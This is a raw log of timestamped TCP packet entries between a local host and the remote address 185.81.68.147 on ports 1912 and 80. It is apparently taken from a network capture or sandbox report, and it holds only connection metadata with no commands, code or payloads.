                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154756069 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154778957 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154803991 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154839039 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154871941 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154908895 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154949903 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154974937 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.154983044 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155013084 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155076981 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155086040 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155133963 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155193090 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155234098 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155325890 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155368090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155414104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155422926 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155529976 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.155539036 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156058073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156856060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156867981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156886101 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156894922 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156903028 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156910896 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156922102 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.156987906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157006025 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157016039 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157057047 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157100916 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157152891 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157160997 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157267094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157361984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157542944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157681942 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157855034 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157864094 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.157900095 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158268929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158374071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158425093 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158489943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158617020 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158720970 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158752918 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158767939 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158828974 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158870935 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158955097 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158956051 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.158965111 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159008980 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159013033 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159034967 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159149885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159244061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159427881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159652948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159939051 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159946918 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159960985 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159970045 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.159977913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160069942 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160183907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160219908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160228968 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160315037 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160337925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160360098 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160444021 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160451889 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160499096 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160506964 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160584927 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.160981894 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161510944 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161767960 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161780119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161791086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161808014 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161814928 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161829948 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161838055 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161844969 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161853075 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.161879063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.162096024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.162190914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.162532091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.163106918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.163165092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.163357973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.164073944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.164087057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.164572001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.164941072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.165019989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.165117025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.167264938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.168390989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.168585062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169296980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169327974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169359922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169392109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169431925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169657946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169689894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169691086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.169933081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.170810938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.170844078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.171197891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.171499968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.171685934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.172012091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.172574997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.172606945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.173446894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.173480034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.173964024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.174145937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.174525976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.174525976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.174525976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.175457001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.175489902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.175628901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.176316023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.176512957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.176635027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.177139044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.177355051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.177589893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.178211927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.178226948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.178374052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.179065943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.179245949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.179358006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.180136919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.180171967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.180260897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.181046009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.181082010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.181252003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.182030916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.182212114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.182318926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.182997942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.183012009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.183089972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.183809996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.184014082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.184195995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.184693098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.184870958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.184978008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.185676098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.185993910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.186177015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.186752081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.186929941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.187038898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.187773943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.187784910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.187887907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.188735008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.188755035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.188831091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.189554930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.189723015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.189945936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.190541029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.190725088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.190949917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.191514015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.191684961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.192487001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.192523956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.192665100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.192826033 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.193497896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.193671942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.193754911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.194475889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.194493055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.194618940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.195324898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.195488930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.195611000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.196315050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.196481943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.196664095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.197316885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.197649956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.197660923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.197788954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274247885 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274305105 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274313927 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274405956 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274415016 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274499893 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274508953 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274557114 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274730921 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274739027 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274746895 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274867058 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.274876118 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.275068998 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.275078058 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.275085926 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.275094986 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.275105953 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.275122881 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.275130987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.275367975 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.275474072 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.278723955 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.278981924 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.278990030 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279000998 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279042006 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279093981 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279103041 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279221058 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279228926 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279273033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279364109 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279376984 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279414892 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279541969 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279550076 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279601097 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279609919 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279702902 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279712915 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279757023 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279817104 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279870033 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279879093 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.279999018 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280008078 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280046940 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280085087 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280128956 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280177116 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280278921 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280287981 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280349970 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280358076 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280440092 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280447960 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280534029 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280541897 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280651093 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280703068 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280755043 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280764103 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280853987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280863047 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280941010 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.280950069 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281042099 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281050920 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281095982 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281105042 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281193972 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.281203032 CET191249710185.81.68.147192.168.2.8
